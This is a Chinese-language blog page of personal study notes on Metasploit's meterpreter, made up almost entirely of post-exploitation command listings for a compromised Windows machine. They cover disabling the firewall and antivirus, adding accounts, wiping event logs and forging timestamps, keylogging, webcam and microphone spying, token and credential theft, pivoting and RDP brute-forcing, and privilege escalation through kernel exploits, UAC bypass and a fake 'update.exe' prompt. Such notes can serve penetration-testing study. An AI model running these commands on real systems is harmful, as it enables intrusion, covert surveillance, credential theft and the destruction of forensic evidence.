



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Go Forward" href="http://chungod.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Go Forward" href="http://chungod.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="Go Forward" href="http://chungod.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="meterpreter学习笔记" />


<link rel="canonical" href="http://chungod.github.io/2021/04/21/meterpreter%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E6%80%BB%E7%BB%93/">



  <title>
meterpreter学习笔记 |
Go Forward = 人生像攀登一座山，而找寻出路，却是一种学习的过程，我们应当在这过程中，学习稳定、冷静，学习如何从慌乱中找到生机</title>
<meta name="generator" content="Hexo 5.4.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">meterpreter学习笔记
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2021-04-21 10:24:41">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2021-04-21T10:24:41+08:00">2021-04-21</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Go Forward</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gicitzannuj20zk0m8b29.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipex2cdtbj20zk0m8x6p.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gicliwyw55j20zk0m8hdt.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclfb3vzhj20zk0m8wny.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipeuibk9fj20zk0m8ay2.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gicm07ih54j20zk0m84qp.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://chungod.github.io/2021/04/21/meterpreter%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E6%80%BB%E7%BB%93/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="chun">
    <meta itemprop="description" content="人生像攀登一座山，而找寻出路，却是一种学习的过程，我们应当在这过程中，学习稳定、冷静，学习如何从慌乱中找到生机, 欢迎来到我的博客(*^﹏^*),本人为新人,你可以阅读我的学习笔记并提出独到的见解~我们将互相学习,共同进步,望大佬们勿喷">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Go Forward">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h2 id="meterpreter学习笔记总结"><a class="markdownIt-Anchor" href="#meterpreter学习笔记总结">#</a> meterpreter 学习笔记总结</h2>
<h2 id="系统命令"><a class="markdownIt-Anchor" href="#系统命令">#</a> 系统命令</h2>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">background # 将当前会话放置后台</span><br><span class="line">sessions # sessions –h 查看帮助</span><br><span class="line">sessions -i &lt;ID 值&gt; #进入会话 -k 杀死会话</span><br><span class="line">bgrun &#x2F; run # 执行已有的模块，输入 run 后按两下 tab，列出已有的脚本</span><br><span class="line">info # 查看已有模块信息</span><br><span class="line">getuid # 查看当前用户身份</span><br><span class="line">getprivs # 查看当前用户具备的权限</span><br><span class="line">getpid # 获取当前进程 ID(PID)</span><br><span class="line">sysinfo # 查看目标机系统信息</span><br><span class="line">irb # 开启 ruby 终端</span><br><span class="line">ps # 查看正在运行的进程</span><br><span class="line">kill &lt;PID 值&gt; # 杀死指定 PID 进程</span><br><span class="line">idletime # 查看目标机闲置时间</span><br><span class="line">reboot &#x2F; shutdown # 重启&#x2F;关机</span><br><span class="line">shell # 进入目标机 cmd shell</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306164115799.png" alt="image-20210306164115799"></p>
<h2 id="常用-cmd-命令"><a class="markdownIt-Anchor" href="#常用-cmd-命令">#</a> 常用 cmd 命令</h2>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">whoami # 当前权限</span><br><span class="line">quser # 查询当前在线的管理员</span><br><span class="line">net user # 查看存在用户</span><br><span class="line">net user 用户名 密码 &#x2F;add # 添加用户和对应密码</span><br><span class="line">net localgroup 用户组名 用户名 &#x2F;add # 将指定用户添加到指定用户组</span><br><span class="line">netstat -ano # 查询当前计算机中网络连接通信情况，LISTENING 表示该端口处于监听状态；ESTABLISHED 表示该端口处于工作（通信）状态</span><br><span class="line">systeminfo # 查看当前计算机中的详细情况</span><br><span class="line">tasklist &#x2F;svc # 查看每个进程所对应的服务</span><br><span class="line">taskkill &#x2F;f &#x2F;im 程序名称 # 结束某个指定名称的程序</span><br><span class="line">taskkill &#x2F;f &#x2F;PID ID # 结束某个指定 PID 的进程</span><br><span class="line">tasklist | findstr &quot;字符串&quot; # 查找输出结果中指定的内容</span><br><span class="line">logoff # 注销某个指定用户的 ID</span><br><span class="line">shutdown -r # 重启当前计算机</span><br><span class="line">netsh adcfirewall set allprofiles state off # 关闭防火墙</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306164329741.png" alt="image-20210306164329741"></p>
<h3 id="uictl-开关键盘鼠标"><a class="markdownIt-Anchor" href="#uictl-开关键盘鼠标">#</a> uictl 开关键盘 / 鼠标</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">uictl [enable&#x2F;disable] [keyboard&#x2F;mouse&#x2F;all] # 开启或禁止键盘&#x2F;鼠标</span><br><span class="line">uictl disable mouse # 禁用鼠标</span><br><span class="line">uictl disable keyboard # 禁用键盘</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306164436345.png" alt="image-20210306164436345"></p>
<h3 id="execute-执行文件"><a class="markdownIt-Anchor" href="#execute-执行文件">#</a> execute 执行文件</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">execute #在目标机中执行文件</span><br><span class="line">execute -H -i -f cmd.exe # 创建新进程 cmd.exe，-H 不可见，-i 交互</span><br><span class="line">execute -H -m -d notepad.exe -f payload.exe -a &quot;-o hack.txt&quot;</span><br><span class="line"># -d 在目标主机执行时显示的进程名称（用以伪装）-m 直接从内存中执行</span><br><span class="line">&quot;-o hack.txt&quot;是 payload.exe 的运行参数</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306164555155.png" alt="image-20210306164555155"></p>
<h3 id="clearav-清除日志"><a class="markdownIt-Anchor" href="#clearav-清除日志">#</a> clearav 清除日志</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">clearav # 清除 windows 中的应用程序日志、系统日志、安全日志</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306164632840.png" alt="image-20210306164632840"></p>
<h2 id="文件系统命令"><a class="markdownIt-Anchor" href="#文件系统命令">#</a> 文件系统命令</h2>
<p>基本文件系统命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">ls # 列出当前目录中的文件列表</span><br><span class="line">cd # 进入指定目录</span><br><span class="line">getwd &#x2F; pwd # 查看当前工作目录</span><br><span class="line">search -d c:\\ -f *.txt # 搜索文件 -d 目录 -f 文件名</span><br><span class="line">cat c:\\123.txt # 查看文件内容</span><br><span class="line">upload &#x2F;tmp&#x2F;hack.txt C:\\ # 上传文件到目标机上</span><br><span class="line">download c:\\123.txt &#x2F;tmp&#x2F; # 下载文件到本机上</span><br><span class="line">edit c:\\test.txt # 编辑或创建文件 没有的话，会新建文件</span><br><span class="line">rm C:\\hack.txt # 删除文件</span><br><span class="line">mkdir admin # 只能在当前目录下创建文件夹</span><br><span class="line">rmdir admin # 只能删除当前目录下文件夹</span><br><span class="line">getlwd &#x2F; lpwd # 查看本地当前目录</span><br><span class="line">lcd &#x2F;tmp # 切换本地目录</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306164754287.png" alt="image-20210306164754287"></p>
<h3 id="timestomp-伪造时间戳"><a class="markdownIt-Anchor" href="#timestomp-伪造时间戳">#</a> timestomp 伪造时间戳</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">timestomp C:\\ -h #查看帮助</span><br><span class="line">timestomp -v C:\\2.txt #查看时间戳</span><br><span class="line">timestomp C:\\2.txt -f C:\\1.txt #将 1.txt 的时间戳复制给 2.txt</span><br><span class="line">timestomp c:\\test\\22.txt -z &quot;03&#x2F;10&#x2F;2019 11:55:55&quot; -v # 把四个属性设置为统一时间</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306164910512.png" alt="image-20210306164910512"></p>
<h2 id="网络命令"><a class="markdownIt-Anchor" href="#网络命令">#</a> 网络命令</h2>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ipconfig&#x2F;ifconfig # 查看网络接口信息</span><br><span class="line">netstat –ano # 查看网络连接状态</span><br><span class="line">arp # 查看 arp 缓冲表</span><br><span class="line">getproxy # 查看代理信息</span><br><span class="line">route # 查看路由表信息</span><br></pre></td></tr></table></figure>
<h3 id="portfwd-端口转发"><a class="markdownIt-Anchor" href="#portfwd-端口转发">#</a> portfwd 端口转发</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">portfwd add -l 1234 -p 3389 -r 127.0.0.1</span><br><span class="line">#将目标机的 3389 端口转发到本地 1234 端口</span><br><span class="line">rdesktop 127.0.0.1:1234 # 需要输入用户名密码连接</span><br><span class="line">rdesktop -u Administrator -p P@ssw0rd 127.0.0.1:1234 # -u 用户名 -p 密码</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306165457433.png" alt="image-20210306165457433"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306165547893.png" alt="image-20210306165547893"></p>
<h3 id="autoroute-添加路由"><a class="markdownIt-Anchor" href="#autoroute-添加路由">#</a> autoroute 添加路由</h3>
<p>参考  <span class="exturl" data-url="aHR0cHM6Ly93d3cuYW5xdWFua2UuY29tL3Bvc3QvaWQvODY1MDU=">https://www.anquanke.com/post/id/86505</span></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -h # 查看帮助</span><br><span class="line">run get_local_subnets # 查看目标内网网段地址</span><br><span class="line">run autoroute -s 192.168.183.0&#x2F;24 # 添加目标网段路由</span><br><span class="line">run autoroute -p # 查看添加的路由</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306165902512.png" alt="image-20210306165902512"></p>
<p>利用 arp_scanner、portscan 等进行扫描</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;arp_scanner RHOSTS&#x3D;192.168.183.0&#x2F;24</span><br><span class="line">run auxiliary&#x2F;scanner&#x2F;portscan&#x2F;tcp RHOSTS&#x3D;192.168.183.146 PORTS&#x3D;3389</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306170155805.png" alt="image-20210306170155805"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306170548344.png" alt="image-20210306170548344"></p>
<h3 id="socks-代理"><a class="markdownIt-Anchor" href="#socks-代理">#</a> Socks 代理</h3>
<p>只有在目标设备添加完路由后才可以通过 msf 自带的 socks4a 模块进行 socks4 代理转发</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary&#x2F;server&#x2F;socks4a</span><br><span class="line">set srvhost 127.0.0.1</span><br><span class="line">set srvport 2000</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306170840980.png" alt="image-20210306170840980"></p>
<p>然后 vim /etc/proxychains.conf ，在文件末尾添加 socks4 代理服务器</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306170930216.png" alt="image-20210306170930216"></p>
<p>使用 proxychains 代理访问执行 nmap 操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">proxychains nmap -sV -p 445 --script&#x3D;smb-vuln-ms17-010.nse 192.168.183.146 # 扫描永恒之蓝漏洞</span><br><span class="line">proxychains hydra 192.168.183.146 rdp -l administrator -P password.txt -V # rdp 服务暴力破解</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306171108261.png" alt="image-20210306171108261"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306171139549.png" alt="image-20210306171139549"></p>
<h2 id="信息收集"><a class="markdownIt-Anchor" href="#信息收集">#</a> 信息收集</h2>
<p>常用脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">run arp_scanner -r 192.168.183.1&#x2F;24 # 利用 arp 进行存活主机扫描</span><br><span class="line">run winenum # 自动化执行一些检测脚本</span><br><span class="line">run credcollect # 获取用户 hash</span><br><span class="line">run domain_list_gen # 获取域管理账户列表</span><br><span class="line">run post&#x2F;multi&#x2F;gather&#x2F;env # 获取用户环境变量</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;enum_logged_on_users -c # 列出当前登录用户</span><br><span class="line">run post&#x2F;linux&#x2F;gather&#x2F;checkvm # 是否虚拟机</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;checkvm # 是否虚拟机</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;forensics&#x2F;enum_drives # 查看存储器信息</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;enum_applications # 获取安装软件信息</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;dumplinks # 获取最近访问过的文档、链接信息</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;enum_ie # 获取 IE 缓存</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;enum_firefox # 获取 firefox 缓存</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;enum_chrome # 获取 Chrome 缓存</span><br><span class="line">run post&#x2F;multi&#x2F;recon&#x2F;local_exploit_suggester # 获取本地提权漏洞</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;enum_patches # 获取补丁信息</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;enum_domain # 查找域控</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;enum_snmp # 获取 snmp 团体名称</span><br><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;credentials&#x2F;vnc # 获取 vnc 密码</span><br><span class="line">run post&#x2F;windows&#x2F;wlan&#x2F;wlan_profile # 用于读取目标主机 WiFi 密码</span><br><span class="line">run post&#x2F;multi&#x2F;gather&#x2F;wlan_geolocate # 基于 wlan 进行地理位置确认 文件位于&#x2F;root&#x2F;.msf4&#x2F;loot</span><br><span class="line">run post&#x2F;windows&#x2F;manage&#x2F;killav 关闭杀毒软件</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306171454981.png" alt="image-20210306171454981"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306171504647.png" alt="image-20210306171504647"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306171918329.png" alt="image-20210306171918329"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306172108912.png" alt="image-20210306172108912"></p>
<h3 id="常用的破解模块"><a class="markdownIt-Anchor" href="#常用的破解模块">#</a> 常用的破解模块</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">auxiliary&#x2F;scanner&#x2F;mssql&#x2F;mssql_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;ftp&#x2F;ftp_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;ssh&#x2F;ssh_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;telnet&#x2F;telnet_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;smb&#x2F;smb_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;mssql&#x2F;mssql_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;mysql&#x2F;mysql_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;oracle&#x2F;oracle_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;postgres&#x2F;postgres_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;vnc&#x2F;vnc_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;pcanywhere&#x2F;pcanywhere_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;snmp&#x2F;snmp_login</span><br><span class="line">auxiliary&#x2F;scanner&#x2F;ftp&#x2F;anonymous</span><br></pre></td></tr></table></figure>
<h3 id="键盘记录"><a class="markdownIt-Anchor" href="#键盘记录">#</a> 键盘记录</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">keyscan_start # 开始键盘记录</span><br><span class="line">keyscan_dump # 导出记录数据</span><br><span class="line">keyscan_stop # 结束键盘记录</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306172219342.png" alt="image-20210306172219342"></p>
<h3 id="sniffer-抓包"><a class="markdownIt-Anchor" href="#sniffer-抓包">#</a> sniffer 抓包</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use sniffer</span><br><span class="line">sniffer_interfaces # 查看网卡</span><br><span class="line">sniffer_start 1 # 选择网卡 1 开始抓包</span><br><span class="line">sniffer_stats 1 # 查看网卡 1 状态</span><br><span class="line">sniffer_dump 1 &#x2F;tmp&#x2F;wlan1.pcap # 导出 pcap 数据包</span><br><span class="line">sniffer_stop 1 # 停止网卡 1 抓包</span><br><span class="line">sniffer_release 1 # 释放网卡 1 流量</span><br></pre></td></tr></table></figure>
<h3 id="窃取令牌"><a class="markdownIt-Anchor" href="#窃取令牌">#</a> 窃取令牌</h3>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306172412924.png" alt="image-20210306172412924"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">steal_token &lt;pid 值&gt; # 从指定进程中窃取 token</span><br><span class="line">drop_token # 停止假冒当前的 token</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306172447283.png" alt="image-20210306172447283"></p>
<h3 id="网络摄像头"><a class="markdownIt-Anchor" href="#网络摄像头">#</a> 网络摄像头</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">record_mic # 音频录制</span><br><span class="line">webcam_chat # 开启视频聊天(对方有弹窗）</span><br><span class="line">webcam_list # 查看摄像头</span><br><span class="line">webcam_snap # 通过摄像头拍照</span><br><span class="line">webcam_stream # 通过摄像头开启视频监控(以网页形式进行监控≈直播）</span><br></pre></td></tr></table></figure>
<h3 id="截屏"><a class="markdownIt-Anchor" href="#截屏">#</a> 截屏</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">截屏</span><br><span class="line">screenshot # 截屏</span><br><span class="line">use espia # 使用 espia 模块</span><br><span class="line">screengrab # 截屏</span><br></pre></td></tr></table></figure>
<h2 id="提权"><a class="markdownIt-Anchor" href="#提权">#</a> 提权</h2>
<p>getsystem 提权<br>
利用 getsystem 命令提权，该命令会自动寻找各种可能的提权技术来使得用户将权限提升到更高的级别。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">getsystem 提权</span><br><span class="line">getuid 查看已获得权限</span><br></pre></td></tr></table></figure>
<h3 id="enum_patches-模块"><a class="markdownIt-Anchor" href="#enum_patches-模块">#</a> enum_patches 模块</h3>
<p>利用 enum_patches 模块搜集补丁信息，然后寻找可利用的 exploits 进行提权。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">run post&#x2F;windows&#x2F;gather&#x2F;enum_patches #查看补丁信息</span><br><span class="line">background</span><br><span class="line">search MS10-015</span><br><span class="line">use exploit&#x2F;windows&#x2F;local&#x2F;ms10_015_kitrap0d</span><br><span class="line">set session 8</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306172904051.png" alt="image-20210306172904051"></p>
<h3 id="绕过-uac-提权"><a class="markdownIt-Anchor" href="#绕过-uac-提权">#</a> 绕过 UAC 提权</h3>
<p>msf 内置一些 bypassuac 脚本，原理不同，使用方法类似，执行后返回一个新的会话，再次执行 getsystem 即可提权</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">exploit&#x2F;windows&#x2F;local&#x2F;bypassuac</span><br><span class="line">exploit&#x2F;windows&#x2F;local&#x2F;bypassuac_eventvwr</span><br><span class="line">exploit&#x2F;windows&#x2F;local&#x2F;bypassuac_injection</span><br><span class="line">exploit&#x2F;windows&#x2F;local&#x2F;bypassuac_injection_winsxs</span><br><span class="line">exploit&#x2F;windows&#x2F;local&#x2F;bypassuac_silentcleanup</span><br><span class="line">exploit&#x2F;windows&#x2F;local&#x2F;bypassuac_vbs</span><br></pre></td></tr></table></figure>
<p>使用命令 getsystem 提权失败，然后利用 bypassuac 来提权，这里利用 exploit/windows/local/bypassuac 模块 (32 位、64 位都有效)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">backgroup</span><br><span class="line">use exploit&#x2F;windows&#x2F;local&#x2F;bypassuac</span><br><span class="line">set session 1</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210306173046136.png" alt="image-20210306173046136"></p>
<h3 id="使用-runas-提权"><a class="markdownIt-Anchor" href="#使用-runas-提权">#</a> 使用 RunAs 提权</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">该方法利用 exploit&#x2F;windows&#x2F;local&#x2F;ask 模块(32 位、64 位都有效)，创建一个可执行文件并在目标机上发起一个提升权限请求的</span><br><span class="line">程序，触发系统 UAC，提示用户是否要继续，如果用户选择“是”，则会返回一个高权限的 meterpreter shell。</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;windows&#x2F;local&#x2F;ask</span><br><span class="line">set filename update.exe # 设置反弹程序名称</span><br><span class="line">set session 1</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p>输入 run 命令以后会在目标机上弹出 UAC，提示用户是否允许，选择是就会返回一个高权限的 meterpreter shell</p>
